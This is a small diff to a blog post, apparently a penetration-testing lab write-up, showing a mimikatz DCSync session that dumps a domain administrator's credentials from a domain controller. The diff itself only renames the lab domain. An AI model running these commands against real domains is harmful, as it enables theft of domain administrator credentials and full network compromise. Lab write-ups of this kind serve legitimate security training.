vipa0z/vipa0z.github.io/source/_posts/dcsync.md

 mimikatz # privilege::debug
 Privilege '20' OK

-mimikatz # lsadump::dcsync /domain:echoridge.local /user:INLANEFREIGHT\administrator
+mimikatz # lsadump::dcsync /domain:echoridge.local /user:echoridge\administrator
 [DC] 'echoridge.local' will be the domain
-[DC] 'ACADEMY-EA-DC01.echoridge.local' will be the DC server [DC] 'INLANEFREIGHT\administrator' will be the user account
+[DC] 'ACADEMY-EA-DC01.echoridge.local' will be the DC server [DC] 'echoridge\administrator' will be the user account

 Object RDN           : Administrator